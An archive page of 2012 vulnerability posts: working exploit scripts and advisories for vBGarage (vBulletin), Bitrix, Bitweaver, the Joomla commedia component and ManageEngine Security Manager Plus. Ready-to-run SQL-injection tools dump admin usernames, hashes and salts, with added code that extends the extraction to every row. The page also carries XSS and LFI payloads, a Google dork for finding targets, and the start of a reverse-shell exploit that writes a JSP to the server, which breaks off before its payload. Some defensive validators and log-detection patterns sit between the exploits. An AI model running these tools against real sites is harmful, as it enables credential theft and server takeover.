Archive for 24 October 2012

vBGarage Pro vBulletin Mod – SQL Injection

An SQL injection vulnerability was found in the vBGarage Pro vBulletin mod. Where the flaw occurs and how it is used are shown below.

#!/bin/bash 
############## 
# MegaManSec # 
############## 
############## 
#  InterNot  # 
############## 
echo "MegaManSec @ www.internot.info"
echo "White-Hat Hacker :)"
if [ -z "$1" ]; then
    echo "Usage: $0 http://link.to/forum/"
    echo "Example: $0 http://f800riders.org/forum/"
    exit 1 
fi
# Private temp file instead of the predictable /tmp/vbg.tmp, removed on every exit path
tmpfile="$(mktemp)" || exit 1
trap 'rm -f "$tmpfile"' EXIT

# Error-based (double query) injection through the model_year search field:
# the GROUP BY on concat(<row>, floor(rand(0)*2)) collides, and MySQL echoes the
# colliding key, i.e. username:password:salt of the first user whose usergroupid
# contains a 6 (6 is vBulletin's default Administrators group).
echo "securitytoken=guest&s=&searchuser=&search_year=1&model_year=') IN (select (1) from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where usergroupid LIKE '%6%' LIMIT 1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''=''#&make_id=&model_id=&trim_id=&club_id=&category_id=&engine_type=&veh_class=&manufact_id=&product_id=&search_logic=any&do=search_results&submit=%3ESearch" > "$tmpfile"

# Pull the MySQL error out of the response, keep what sits between "Duplicate entry"
# and "for key", and let w3m decode the HTML entities
sqldata=$(curl -s -X POST -d @"$tmpfile" "${1}garage.php?do=search" | grep -i 'MYSQL Error' | awk -F "Duplicate entry" '{print $2}' | awk -F "for key" '{print $1}' | w3m -dump -T text/html)

# $? at this point is w3m's exit status, which is 0 even when grep matched nothing,
# so test the extracted text itself
if [ -z "$sqldata" ]; then
    echo "Either not vulnerable, or is not showing the hash+pwd, try manually if you don't believe"
    exit 1 
fi
echo "Here is username:hash:salt"
echo "$sqldata"
exit 0  
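The building blocks of the "duplicate entry" extraction the script above relies on, as an added example that is not part of the advisory or of MegaManSec's script: a payload builder generalised to walk every row with LIMIT offset,1 (the script sends a single LIMIT 1), and a parser for the HTML error page that also reports when MySQL's 64-character cap on the echoed key has cut the row short. The sample response below is constructed, not a capture from a real forum.

```python
import html
import re

# MySQL names the colliding GROUP BY key in the error text; that key is our
# concat() followed by the 0/1 produced by floor(rand(0)*2).
DUP_ENTRY_RE = re.compile(r"Duplicate entry '(.*?)' for key")

# MySQL cuts the key shown in the error message at 64 characters, so rows longer
# than that come back incomplete (username:md5:salt normally fits).
MAX_DUP_ENTRY_LEN = 64


def build_dup_entry_payload(columns, table, where="1=1", offset=0, sep="~"):
    """SQL fragment to inject after a closing quote (the script's model_year value).

    columns: column names, joined with ':' (0x3a) in the leaked row
    table:   table to read (vBulletin keeps accounts in `user`)
    offset:  row for LIMIT offset,1 so successive requests walk every row
    """
    cols = ",0x3a,".join(columns)
    inner = (f"select concat(cast(concat({cols}) as char),0x{sep.encode().hex()}) "
             f"from {table} where {where} limit {offset},1")
    return (f"') IN (select (1) from (select count(*),concat(({inner}),"
            f"floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''=''#")


def parse_dup_entry(body, sep="~"):
    """Return (row, truncated) from an HTML error page, or None if nothing leaked.

    Entities are decoded first because vBulletin HTML-escapes the error text
    (the script above leaves that job to w3m -dump).
    """
    m = DUP_ENTRY_RE.search(html.unescape(body))
    if not m:
        return None
    key = m.group(1)
    complete = key.endswith((sep + "0", sep + "1"))   # separator + rand() digit survived
    row = key[:key.rfind(sep)] if complete else key
    truncated = len(key) >= MAX_DUP_ENTRY_LEN and not complete
    return row, truncated


# Constructed sample of the error page a vulnerable forum would return.
SAMPLE_RESPONSE = """<html><body><p>Database error in vBulletin:</p>
<p>MySQL Error   : Duplicate entry &#039;admin:5f4dcc3b5aa765d61d8327deb882cf99:xK9~1&#039; for key &#039;group_key&#039;</p>
</body></html>"""


def demo():
    """Row leaked by the sample page and the payload for the next row."""
    leaked = parse_dup_entry(SAMPLE_RESPONSE)
    next_payload = build_dup_entry_payload(["username", "password", "salt"], "user",
                                           "usergroupid LIKE '%6%'", offset=1)
    return leaked, next_payload


if __name__ == "__main__":
    print(demo())
```

The script's `usergroupid LIKE '%6%'` matches any group id containing the digit 6 (16, 26, 60, ...), not only group 6; an equality test is the stricter choice when the target group is known.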

Bitrix Site Manager 11.5 XSS / Content Spoofing

XSS and content spoofing vulnerabilities were found in Bitrix Site Manager 11.5. The description of the flaws is given below.

I want to warn you about security vulnerabilities in Bitrix Site Manager. It  
is a commercial CMS. 
 
These are Content Spoofing and Cross-Site Scripting vulnerabilities. These  
holes bypass the built-in WAF and all other protections of Bitrix. 
 
------------------------- 
Affected products: 
------------------------- 
 
Bitrix Site Manager 11.5 and previous versions, which contain JW Player Pro,  
are vulnerable. 
 
Versions of Bitrix 11.5 released after 2012.08.24 should not be affected, because the  
developers fixed these holes after I informed them. As I have checked (at the  
developers' main sites, where I found these vulnerabilities), they were fixed  
by removing this flash file. 
 
Vulnerabilities are similar to the ones in JW Player  
(http://securityvulns.ru/docs28176.html) and JW Player Pro  
(http://securityvulns.ru/docs28483.html). 
 
To find these holes, which bypass the WAF and all their other protections,  
1C-Bitrix had no need to waste their time and money on holding a  
competition at the hacking conference CC9  
(http://www.1c-bitrix.ru/about/life/news/171346/) for bypassing their  
Proactive Protection (WAF) and other protections of the CMS, or on working with a  
security company, none of which were able to find these holes in Bitrix for  
many years; they should just have contacted me, or read my public advisory  
from June concerning vulnerabilities in JW Player. 
 
---------- 
Details: 
---------- 
 
Content Spoofing (WASC-12): 
 
The file parameter accepts both video and audio files. 
 
The swf file of JW Player accepts arbitrary addresses in the parameters file and  
image, which allows spoofing the content of the flash, i.e. by setting the addresses of  
video (audio) and/or image files from another site. 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?file=1.flv&image=1.jpg 
 
The swf file of JW Player accepts arbitrary addresses in the parameter config, which  
allows spoofing the content of the flash, i.e. by setting the address of a config file  
from another site (the parameters file and image in the xml file accept arbitrary  
addresses). For a config file to be loaded from another site, that site needs to have a  
crossdomain.xml. 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?config=1.xml 
 
1.xml 
 
<config> 
<file>1.flv</file> 
<image>1.jpg</image> 
</config> 
 
The swf file of JW Player accepts arbitrary addresses in the parameter playlistfile,  
which allows spoofing the content of the flash, i.e. by setting the address of a playlist  
file from another site (the parameters media:content and media:thumbnail in the  
xml file accept arbitrary addresses). For a playlist file to be loaded from  
another site, that site needs to have a crossdomain.xml. 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?playlistfile=1.rss 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?playlistfile=1.rss&playlist.position=right&playlist.size=200 
 
1.rss 
 
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/"> 
<channel> 
<title>Example playlist</title> 
<item> 
<title>Video #1</title> 
<description>First video.</description> 
<media:content url="1.flv" duration="5" /> 
<media:thumbnail url="1.jpg" /> 
</item> 
<item> 
<title>Video #2</title> 
<description>Second video.</description> 
<media:content url="2.flv" duration="5" /> 
<media:thumbnail url="2.jpg" /> 
</item> 
</channel> 
</rss> 
 
XSS (WASC-08): 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?playerready=alert(document.cookie) 
 
XSS (WASC-08): 
 
If a page of the site that uses jwplayer.swf (player.swf) allows (via HTML injection)  
JS code with a callback function to be included, and there are 19 such functions  
in total, then an XSS attack is possible. I.e. the JS callbacks can be used for an  
XSS attack. 
 
Example of exploit: 
 
<script type="text/javascript" src="jwplayer.js"></script> 
<div id="container">...</div> 
<script type="text/javascript"> 
jwplayer("container").setup({ 
flashplayer: "jwplayer.swf", 
file: "1.flv", 
autostart: true, 
height: 300, 
width: 480, 
events: { 
onReady: function() { alert(document.cookie); }, 
onComplete: function() { alert(document.cookie); }, 
onBufferChange: function() { alert(document.cookie); }, 
onBufferFull: function() { alert(document.cookie); }, 
onError: function() { alert(document.cookie); }, 
onFullscreen: function() { alert(document.cookie); }, 
onMeta: function() { alert(document.cookie); }, 
onMute: function() { alert(document.cookie); }, 
onPlaylist: function() { alert(document.cookie); }, 
onPlaylistItem: function() { alert(document.cookie); }, 
onResize: function() { alert(document.cookie); }, 
onBeforePlay: function() { alert(document.cookie); }, 
onPlay: function() { alert(document.cookie); }, 
onPause: function() { alert(document.cookie); }, 
onBuffer: function() { alert(document.cookie); }, 
onSeek: function() { alert(document.cookie); }, 
onIdle: function() { alert(document.cookie); }, 
onTime: function() { alert(document.cookie); }, 
onVolume: function() { alert(document.cookie); } 
} 
}); 
</script> 
 
The licensed version of the player has a logo feature, so licensed versions of the  
swf file also have the following vulnerabilities: 
 
Content Spoofing (WASC-12): 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?file=1.flv&logo.file=1.jpg&logo.link=http://websecurity.com.ua 
 
XSS (WASC-08): 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?file=1.flv&logo.file=1.jpg&logo.link=javascript:alert(document.cookie) 
 
Content Spoofing (WASC-12): 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?abouttext=Player&aboutlink=http://site 
 
XSS (WASC-08): 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B 
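The advisory reports that the vendor fixed these issues by removing the swf. Where a JW Player embed has to stay, the check that was missing is the one below: an added example, not code from the advisory, from Bitrix or from JW Player. It treats the parameter names listed above (file, image, config, playlistfile, logo.file, logo.link, aboutlink, playerready) as the untrusted surface, refuses any URL that leaves the site's own origin or carries a javascript:/data: scheme, restricts the playerready callback to a plain function name, and applies the same origin rule to the URLs inside a config or RSS playlist file. The site origin and the sample inputs are assumptions for the example.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote_plus, urlsplit

SITE = "http://site"   # assumed origin of the page that embeds player.swf

# flashvars that make the player fetch a resource (content spoofing)
URL_PARAMS = {"file", "image", "config", "playlistfile",
              "logo.file", "logo.link", "aboutlink"}
# flashvars whose value the player hands to the page as a JS callback (XSS)
CALLBACK_PARAMS = {"playerready"}
CALLBACK_RE = re.compile(r"[A-Za-z_$][\w$.]*")   # a function name, nothing else
MEDIA_NS = "{http://search.yahoo.com/mrss/}"


def same_origin(url, site=SITE):
    """Accept only a relative path or an http(s) URL on our own host.

    javascript:, data:, other hosts and scheme-relative //host/... are refused,
    as is anything carrying control characters (they can hide a scheme).
    """
    if any(ord(ch) < 0x20 for ch in url):
        return False
    u = urlsplit(url.strip())
    if not u.scheme and not u.netloc:
        return True                       # relative path, resolved against our origin
    return u.scheme in ("http", "https") and u.netloc.lower() == urlsplit(site).netloc.lower()


def parse_flashvars(query):
    """Split a query string on & only; parse_qs on older Pythons also splits on ;,
    which would mangle the data: URL from the advisory."""
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def check_flashvars(query, site=SITE):
    """Map each flashvar that must be refused to the reason."""
    bad = {}
    for name, value in parse_flashvars(query):
        if name in CALLBACK_PARAMS and not CALLBACK_RE.fullmatch(value):
            bad[name] = "callback is not a plain function name: " + value
        elif name in URL_PARAMS and not same_origin(value, site):
            bad[name] = "off-origin or non-http URL: " + value
    return bad


def check_xml(xml_text, site=SITE):
    """Off-origin URLs inside a config file (<file>, <image>) or an RSS playlist
    (media:content / media:thumbnail url attributes)."""
    root = ET.fromstring(xml_text)
    urls = [(el.text or "").strip() for el in root.iter() if el.tag in ("file", "image")]
    urls += [el.get("url", "") for el in root.iter()
             if el.tag in (MEDIA_NS + "content", MEDIA_NS + "thumbnail")]
    return [u for u in urls if not same_origin(u, site)]


# Constructed inputs: the advisory's config file and its playlist with one
# entry pointed at another host.
SAMPLE_CONFIG = "<config><file>1.flv</file><image>1.jpg</image></config>"
SAMPLE_PLAYLIST = """<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/">
<channel><title>Example playlist</title>
<item><title>Video #1</title><media:content url="1.flv" duration="5" /><media:thumbnail url="1.jpg" /></item>
<item><title>Video #2</title><media:content url="http://evil.example/2.flv" duration="5" /><media:thumbnail url="2.jpg" /></item>
</channel></rss>"""


if __name__ == "__main__":
    print(check_flashvars("file=1.flv&logo.file=1.jpg&logo.link=javascript:alert(document.cookie)"))
    print(check_xml(SAMPLE_PLAYLIST))
```

The origin check is deliberately a whitelist (relative path or own host over http/https) rather than a blacklist of schemes, since a blacklist would miss the scheme-relative and control-character variants.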
 
------------ 
Timeline: 
------------  
 
2012.08.16 - informed the developers about the first part of the vulnerabilities. 
2012.08.17 - in reply to their answer, gave the developers recommendations on  
fixing the vulnerabilities. 
2012.08.19 - informed the developers about the second part of the vulnerabilities. 
2012.08.20 - announced at my site. 
2012.08.24 - the developers informed me that they had fixed all these  
vulnerabilities. 
2012.10.20 - disclosed at my site (http://websecurity.com.ua/5992/).  

Bitweaver 2.8.1 Multiple Vulnerabilities

Multiple vulnerabilities (local file inclusion and XSS) were found in Bitweaver 2.8.1. Where they occur and how they are used are shown below:

Trustwave SpiderLabs Security Advisory TWSL2012-016:
Multiple Vulnerabilities in Bitweaver

Published: 10/23/2012
Version: 1.0

Vendor: Bitweaver (http://www.bitweaver.org/)
Product: Bitweaver
Version affected: 2.8.1 and earlier versions

Product description:
Bitweaver is a free and open source web application framework and content
management system. Bitweaver is written in PHP and uses Firebird as a
database backend.

Credit: David Aaron and Jonathan Claudius of Trustwave SpiderLabs

Finding 1: Local File Inclusion Vulnerability
CVE: CVE-2012-5192

The 'overlay_type' parameter in the 'gmap/view_overlay.php' page in
Bitweaver is vulnerable to a local file inclusion vulnerability.

This vulnerability can be demonstrated by traversing to a known readable
path on the web server file system.

Example:

Performing LFI on 'overlay_type' parameter

#Request

http://A.B.C.D/bitweaver/gmap/view_overlay.php?overlay_type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F/etc/passwd%00

#Response

root:x:0:0:root:/root:/bin/bash
<snip>

Finding 2: Multiple XSS Vulnerabilities in Bitweaver
CVE: CVE-2012-5193 

Multiple cross-site scripting (XSS) vulnerabilities have been discovered
that allow remote unauthenticated users to run arbitrary script in the
browsers of the site's users.

Example:

The following Proof of Concepts illustrate that Bitweaver 2.8.1 is
vulnerable to XSS.

Example(s):

1. Performing XSS on stats/index.php

#Request

GET /bitweaver/stats/index.php/%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E HTTP/1.0

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:42:34 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=4gmfnd86ahtvn34v5oejgivvh3; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
[truncated due to length]

2. Performing XSS on /newsletters/edition.php

#Request

GET /bitweaver/newsletters/edition.php/%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E HTTP/1.0

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:42:02 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=ajdjp797r7atral75rmlhcgs63; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
[truncated due to length]

3. Performing XSS on the 'username' parameter available on /users/

#Request

POST /bitweaver/users/remind_password.php HTTP/1.1
Host: A.B.C.D
Content-Type: application/x-www-form-urlencoded
Content-Length: 192

username=%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E&remind=Reset+%28password%29

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:53:11 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=i0ktqmt3497thag552t9ds78v4; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 15974
[truncated due to length]

<snip>
Invalid or unknown username: ">alert('XSS');</p></div>Please follow the instructions in the email.
<snip>

4. Performing XSS on the 'days' parameter on /stats/index.php

#Request

POST /bitweaver/stats/index.php HTTP/1.1
Host: A.B.C.D
Content-Type: application/x-www-form-urlencoded
Content-Length: 177

days=%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E&pv_chart=Display

#Response
HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:55:53 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=dqdvcnmql8jhngp0tphseh1qh4; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 24778
[truncated due to length]

<snip>
<img src="/stats/pv_chart.php?days="><script>alert('XSS');</script>" alt="Site Usage Statistics" />
<snip>

5. Performing XSS on the 'login' parameter on /users/register.php. (try
entering "><IFRAME src="https://www.trustwave.com" height="1000px"
width="1000px"> into the "Username field"):

http://A.B.C.D/bitweaver/users/register.php


6. Performing XSS on the 'highlight' parameter:

#Request

GET /bitweaver/?highlight=%2522%253E%253Cscript%253Ealert('XSS')%253B%253C%252Fscript%253E HTTP/1.0

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:59:09 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=ama93jqlojmi385plkft5opl64; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
[truncated due to length]
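Detection logic for the probes shown in findings 1 and 2, as an added example that is not part of the Trustwave advisory or of Bitweaver, run over constructed Apache combined-log lines (not a real capture). The targets are percent-decoded until stable before matching, because the highlight probe above is double-encoded (%2522 becomes %22 becomes a quote). POST bodies such as the username and days probes never reach an access log; `classify()` is written to take any request text, so it can be applied to bodies recorded by a WAF or ModSecurity audit log as well.

```python
import re
from urllib.parse import unquote

# Apache combined log: client, identity, user, [time], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# finding 1: directory traversal plus the %00 that truncates the include path
LFI_RE = re.compile(r"\.\.[/\\]|\x00")
# finding 2: the tag and handler probes used in the advisory's requests
XSS_RE = re.compile(r"<script|<iframe|javascript:|\bon(?:error|load|click|mouseover)\s*=", re.I)


def decode_fully(s, rounds=3):
    """Percent-decode until the text stops changing (bounded to avoid loops)."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def classify(text):
    """Labels for one request target or body; [] when nothing matched."""
    decoded = decode_fully(text)
    kinds = []
    if LFI_RE.search(decoded):
        kinds.append("lfi")
    if XSS_RE.search(decoded):
        kinds.append("xss")
    return kinds


def scan_log(lines):
    """(client, target, labels) for every logged request that carries a probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue            # not a combined-log line, skip rather than guess
        kinds = classify(m["target"])
        if kinds:
            hits.append((m["ip"], m["target"], kinds))
    return hits


# Constructed log lines replaying the advisory's GET requests plus one benign hit.
SAMPLE_LOG = """10.0.0.5 - - [17/Apr/2012:15:42:34 +0000] "GET /bitweaver/stats/index.php/%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E HTTP/1.0" 200 15974
10.0.0.5 - - [17/Apr/2012:15:42:50 +0000] "GET /bitweaver/gmap/view_overlay.php?overlay_type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F/etc/passwd%00 HTTP/1.0" 200 2048
10.0.0.5 - - [17/Apr/2012:15:59:09 +0000] "GET /bitweaver/?highlight=%2522%253E%253Cscript%253Ealert('XSS')%253B%253C%252Fscript%253E HTTP/1.0" 200 24778
192.0.2.7 - - [17/Apr/2012:16:01:00 +0000] "GET /bitweaver/wiki/index.php?page=Home HTTP/1.1" 200 9001
""".splitlines()


if __name__ == "__main__":
    for ip, target, kinds in scan_log(SAMPLE_LOG):
        print(ip, kinds, target)
```

A 200 status on a traversal request (as in finding 1's response) is the signal worth alerting on; a 404 for the same target usually means the probe failed.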

Remediation Steps:
The vendor has released a fix to address the Local File Inclusion
vulnerability (finding 1) and several of the Cross-Site Scripting
vulnerabilities (finding 2) in Bitweaver 3.1. However, additional fixes for
the Cross-site Scripting vulnerabilities were made on commit c3bef6f in the
development branch.  Users are recommended to download the latest release
of Bitweaver on http://github.com/bitweaver to address the above issues.

These issues can also be mitigated with technologies such as Web
Application Firewalls (WAF) or Intrusion Prevention Systems (IPS). Vulnerability
scanners and Intrusion Detection Systems (IDS) can often detect the presence of
Local File Inclusion and XSS vulnerabilities. Trustwave technologies that
address these issues include the following.

ModSecurity (http://www.modsecurity.org/) has added rules to the commercial
rules feed for these issues, available as part of the SpiderLabs
ModSecurity rules feed.

Trustwave's vulnerability scanning solution, TrustKeeper
(https://www.trustwave.com/trustKeeper.php), has been updated to detect
affected versions.

References
http://www.bitweaver.org/
http://blog.spiderlabs.com/

Vendor Communication Timeline:
04/26/12 - Initial communications with vendor
05/14/12 - Vulnerability disclosed to vendor
05/30/12 - Vendor acknowledges version 3.0 fixes issues
06/07/12 - Contact vendor regarding incomplete fixes in 3.0
09/07/12 - Vendor publishes version 3.1
10/10/12 - Contact vendor regarding incomplete fixes in 3.1
10/23/12 - Advisory published

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.

Joomla commedia Remote Exploit

An SQL injection vulnerability was found in the Joomla commedia extension. The remote Perl exploit and the description of the flaw are as follows.

Exploit Title: Joomla commedia Remote Exploit

dork: inurl:index.php?option=com_commedia

Date: [18-10-2012]

Author: Daniel Barragan "D4NB4R"

Twitter: @D4NB4R

Vendor: http://www.ecolora.org/

Version: 3.1 (last update on Oct 7, 2012) and lower

License: Commercial and Non-Commercial, affects 2 versions

Demo: http://www.ecolora.org/index.php/demo/commedia

Download: http://ecolora.com/index.php/programmy/file/5-plagin-mp3browser-dlya-muzykalnykh-satov-na-joomla-15

Tested on: [Linux(bt5)-Windows(7ultimate)]

Special greetz:  Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt


Description: 

Commedia - a component and content plugin that allows you to create a content table containing all of the MP3's that are present in any directory of your site, a FTP-server (folder, single path to ftp-file) or a HTTP(S)-server (DROPBOX, folder, single path to http-file or http-radio).
 

Exploit: 

#!/usr/bin/perl -w
########################################
# Joomla Component (commedia) Remote SQL Exploit
#----------------------------------------------------------------------------#
########################################
use strict;
use LWP::UserAgent;
use HTTP::Request;

print "\t\t\n\n";
print "\t\n";
print "\t            Daniel Barragan  D4NB4R                \n";
print "\t                                                   \n";
print "\t      Joomla com_commedia Remote Sql Exploit \n";
print "\t\n\n";
print "                   :::Users table prefix options:::\n\n";
print "    1.  jos_users  2.  jml_users  3.  muc_users  4.  sgj_users  \n\n\n";

# The original had one copy of the routine below per table prefix; the copies
# differed only in the table name, so they are collapsed into a lookup table.
my %tables = (1 => "jos_users", 2 => "jml_users", 3 => "muc_users", 4 => "sgj_users");

print ":::Option::: ";
chomp(my $option = <STDIN>);
my $table = $tables{$option} or die "Unknown option '$option'\n";
dump_users($table);

sub dump_users {
    my ($table) = @_;

    print "\nEnter the site:[http://wwww.site.com/path/]: ";
    chomp(my $target = <STDIN>);

    # the username and password columns of the joomla users table
    my $user = "username";
    my $pass = "password";
    my $d4n = "com_commedia&format";
    my $parametro = "down&pid=59&id";

    my $ua = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $ua->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

    # UNION-based injection in the id parameter. The hex literals are the markers
    # <user>, <user><pass> and <pass>; count(*) forces the subquery down to a
    # single row (so it cannot fail with "Subquery returns more than 1 row"),
    # and its value therefore appears in front of the hash in the output.
    my $host = $target . "index.php?option=" . $d4n . "=raw&task=" . $parametro . "=999999.9 union all select (select concat(0x3c757365723e," . $user . ",0x3c757365723e3c706173733e,count(*)," . $pass . ",0x3c706173733e) from " . $table . "),null--";
    my $res = $ua->request(HTTP::Request->new(GET => $host));
    my $answer = $res->content;

    if ($answer =~ /<user>(.*?)<user>/) {
        print "\nExtracted data:\n";
        print "\n\n* Admin User : $1";
    }

    if ($answer =~ /<pass>(.*?)<pass>/) {
        print "\n\n* Admin Hash : $1\n\n";
        print "\t\t#   The exploit returned username and password   #\n\n";
    } else {
        print "\n[-] Exploit Failed, try manually...\n";
    }
}

  
_____________________________________________________
Daniel Barragan "D4NB4R" 2012

           

ManageEngine Security Manager Plus 5.5 build 5505 Remote SYSTEM/root SQLi

The Python exploit for the ManageEngine Security Manager Plus 5.5 build 5505 remote SYSTEM/root SQL injection vulnerability is given below.

#!/usr/bin/env python3
#+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title     : Security Manager Plus <= 5.5 build 5505 Remote SYSTEM/root SQLi (Win+Linux)
# Date              : 18-10-2012
# Author            : xistence (xistence<[AT]>0x90.nl)
# Software link     : http://www.manageengine.com/products/security-manager/81779457/ManageEngine_SecurityManager_Plus.exe (Win)
# Software link     : http://www.manageengine.com/products/security-manager/81779457/ManageEngine_SecurityManager_Plus.zip (Linux)
# Vendor site       : http://www.manageengine.com/
# Version           : 5.5 build 5505 and lower
# Tested on         : CentOS 5.x + Windows XP/2008
#
# Vulnerability     : SQL injection in the "Advanced Search": the input is not validated correctly. To make it worse,
#                     the search can be reached without any authentication, and Security Manager Plus has to run as the
#                     root or SYSTEM user, which makes a remote shell with root/SYSTEM privileges possible.
#
# Fix:
# 1. Go to the SMP server system and stop the SMP service.
# 2. Download SMP_Vul_fix.zip from: http://bonitas.zohocorp.com/4264259/scanfi/31May2012/SMP_Vul_fix.zip
# 3. Extract the downloaded file, which contains four files: AdvPMServer.jar, AdvPMClient.jar, scanfi.jar and AdventNetPMUnixAgent.jar
# 4. Copy the extracted .jar files to the <SMP-HOME>\lib directory (e.g., C:\AdventNet\SecurityManager\lib). [Overwrite the existing jar files and do not rename them]
# 5. Start the SMP service.
#+--------------------------------------------------------------------------------------------------------------------------------+

import random
import string
import sys
import urllib.parse
import urllib.request

if len(sys.argv) != 5:
    print("")
    print("[*] Security Manager Plus 5.5 build 5505 and lower Remote SYSTEM/root SQLi exploit (Windows+Linux) - xistence (xistence<[at]>0x90.nl) - 2012-05-29")
    print("")
    print("[*] Usage: secman-sql.py <RHOST> <LHOST> <LPORT> <OS>")
    print("[*] I.e.:  ./secman-sql.py www.linux.org 192.168.2.66 8888 linux")
    print("[*] I.e.:  ./secman-sql.py www.microsoft.com 192.168.2.66 8888 win")
    print("[*]")
    print("[*] RHOST = Remote Host which runs Security Manager Plus")
    print("[*] LHOST = IP address of local machine (machine where you run the exploit from)")
    print("[*] LPORT = Port on the local machine where you will run NC on for our reverse shell")
    print("[*] OS = linux/win")
    print("")
    print("")
    sys.exit(0)

rhost, lhost, lport, osys = sys.argv[1:5]

if osys == 'linux':
    command = "/bin/bash"
elif osys == 'win':
    command = "cmd.exe"
else:
    print("Choose a valid OS, linux/win")
    sys.exit(1)

# random 6-character name for the JSP dropped into the webapp directory
filename = ''.join(random.sample(string.ascii_lowercase + string.digits, 6)) + ".jsp"

# INTO OUTFILE resolves a relative path against the MySQL data directory, so
# this lands inside the SecurityManager webapp where Tomcat will serve it
output_path = "../../webapps/SecurityManager/%s" % filename

